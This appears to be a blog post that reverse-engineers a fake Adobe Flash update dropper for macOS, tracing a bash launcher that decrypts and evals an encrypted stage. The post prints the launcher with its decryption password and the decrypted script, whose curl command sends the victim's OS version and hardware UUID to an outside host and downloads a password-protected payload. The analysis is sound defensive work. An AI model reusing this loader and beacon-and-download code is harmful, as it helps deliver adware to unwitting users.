A friend goof!
The incident started with an inattentive friend who just downloaded and installed a fake Adobe Flash Update for his Macbook. The culprit ? While browsing izap4u.com (a french website who offers compilations of funny videos), the website showed a malicious pop-up message for an update of Adobe Flash Player. It’s not the case anymore. I do hope it’s over.
Clean up the mess
He reached to me for help and I quickly advised him to install Malwarebytes for Mac. This software let you easily scan and removes malware and works great on MacOS. He installed it and launched a threat scan; obviously the scan found the malware and helped my friend erase it.
I was curious about this Adware so I downloaded it too, in order to reverse it! At first glance it’s small in size .dmg (~108KB only). It contains a “Player_XXX.app” which is represented by the classic Flash Player icon.
Here is the package structure:
/Volumes/Player ❯ tree Player_061.app Player_061.app └── Contents ├── Info.plist ├── MacOS │ └── hikx4NR1tZPZLkfhszbSF2SglR1V8iKE3Q ├── Resources │ ├── app4862950061.icns │ └── enc └── _CodeSignature ├── CodeDirectory ├── CodeRequirements ├── CodeRequirements-1 ├── CodeResources └── CodeSignature 4 directories, 9 files
Here we will look at two files
❯ file Player_061.app/Contents/MacOS/hikx4NR1tZPZLkfhszbSF2SglR1V8iKE3Q Player_061.app/Contents/MacOS/hikx4NR1tZPZLkfhszbSF2SglR1V8iKE3Q: Bourne-Again shell script text executable, ASCII text
❯ cat Player_061.app/Contents/MacOS/hikx4NR1tZPZLkfhszbSF2SglR1V8iKE3Q #!/bin/bash cd "$(dirname "$BASH_SOURCE")" fileDir="$(dirname "$(pwd -P)")" eval "$(openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:4862950061 <"$fileDir"/Resources/enc)"
❯ file Player_061.app/Contents/Resources/enc Player_061.app/Contents/Resources/enc: ASCII text
You can find base64 encrypted content here:
Here, we have a bash script and a base64 encoded text file.
hikx4NR1tZPZLkfhszbSF2SglR1V8iKE3Q BASH script help us to decrypt
enc file with this command:
openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:4862950061 </tmp/Player/Player_061.app/Contents/Resources/enc
You can see the result here (spoiler it’s a bash script too!):
What does this script do?
This bash script strongly rely on the
But what does
eval do ?
If you type
help eval inside a Terminal on MacOS you will get:
eval: eval [arg ...] Read ARGs as input to the shell and execute the resulting command(s).
Pretty easy, right ?
Eval basically concatenates all arguments and executes the result as a command.
We don’t want to install this Adware so we are going to replace the last
echo which only print out the script instead of running it:
chmod +x decrypted_enc.sh and then execute it.
We obtain this (spoiler it’s again a bash script! Script-ception never end):
Prepare the script
This script has a lot of variables, but they are not prefixed by
export because it’s useless inside an
So we have to slightly modify it to make it work outside an
exportbefore every variable, and remove
>/dev/null 2>&1whom silence
stdout, we also add
curlcommand for debugging purposes.
We also want to catch all variables values of this script, so we add a
echo interesting_var=$interesting_varfor all of these.
Finally, we want to print script lines as they are read to follow along while it’s running.
set -vallows us to do this.
One last thing: we definitely don’t want to install the Adware so we comment the last two lines -which open the malicious file and make it executable- with
Here is the final script ready to launch:
(What does this script do?)²
After this we can launch the script to better understand how it works.
Here’s the interesting outputs:
sw_vers -productVersion os_version=10.14.1
An Universally Unique IDentifier (UUID)
The unique equipment identifier IOPlatformUUID (I have anonymized mine)
echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@\1@p')" | tr -dc '[[:print:]]' machine_id=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX
The url to download the malware: it uses
url="http://api.binarysources.com/sd/?c=_pl_GJybQ==&u=$machine_id&s=$session_guid&o=$os_version&b=4862950061" curl -v -f0L "$url" >>$tmp_path
The .zip download via
$url seems to alway have the same password
unzip_password="16005926849404862950061" unzip -P "$unzip_password" "$tmp_path" -d "$app_dir"
This script uses
curl to download the malware, share the macOS version, UUID and the IOPlatformUUID of the victim to the server with query string.
I think the malware is generated thanks to this, it aims to be unique so it can dupe Apple Gatekeeper.
When I attempted to download the malware the url didn’t work anymore so I couldn’t continue the reverse engineering.
curl -v -f0L "$url" >>$tmp_path % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 18.104.22.168... * TCP_NODELAY set * Connected to api.binarysources.com (22.214.171.124) port 80 (#0) > GET /sd/?c=_pl_GJybQ==&u=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX&s=05D6295D-5A6E-43EE-BA60-D602682FAA43&o=10.14.1&b=4862950061 HTTP/1.0 > Host: api.binarysources.com > User-Agent: curl/7.62.0 > Accept: */* > * The requested URL returned error: 404 Not Found 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 * Closing connection 0 curl: (22) The requested URL returned error: 404 Not Found
Be vigilant when you surf the internet and don’t type your password when your are not sure about installer safety.